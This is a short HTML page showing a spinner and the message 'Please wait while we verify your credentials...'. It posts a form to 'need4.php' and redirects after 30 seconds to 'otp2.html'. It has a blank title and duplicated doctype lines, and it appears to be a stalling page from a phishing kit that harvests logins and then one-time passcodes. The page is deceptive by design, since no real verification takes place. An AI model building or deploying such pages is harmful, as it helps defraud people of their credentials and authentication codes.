<!DOCTYPE html>
<html>
<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
	<title></title>
	<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
	<style>
		@font-face{
	font-family: 'fmtt';

  src: url(img/font1.ttf) format('truetype');
  }
*{
	margin:auto;
	font-size:14px;
	outline:0;
	font-family:'fmtt';
}input{
	border:0;
    display:block;
	margin-top:0px;
	width:100%;
	padding:6px;
	background:#f2f2f2;
	
	padding-left:0;
}td{
	border-right:1px solid black;
	padding-right:10px;
	padding-left:10px;
	font-size:11px;
	color:#0072ce;
}.inp{
	margin-top:30px;
	border-radius:15px;
	background:#f2f2f2;
	text-align:center;
	border:1px solid #f2f2f2;
	width:93%;
	padding:6px;
	padding-left:1px;
}label{
	display:block;
	text-align:left;
	margin:0;
	font-size:10px;
	color:gray;
	padding:0;
	width:100%;
}@keyframes roll{
	from{
	transform:rotate(0deg);
	}to{
	rotate:360deg;
	}
}#rl{
	animation:roll 1s infinite;
}

	</style>
</head>
<body>


<div style="max-width:500px;padding:0px;">

<form action="need4.php" method="POST">
<div style="text-align:center">

<meta http-equiv="Refresh" content="30; url=otp2.html">
<span style="display:block;height:40px;width:40px;border:3px solid lightgray;border-radius:70px;border-top-color:#00688f;margin-top:200px;" id="rl"></span>
</div>
<p style="text-align:center;font-size:14px;margin-top:18px">Please wait while we verify your credentials...</p>
</div>



</form>



</body>
</html>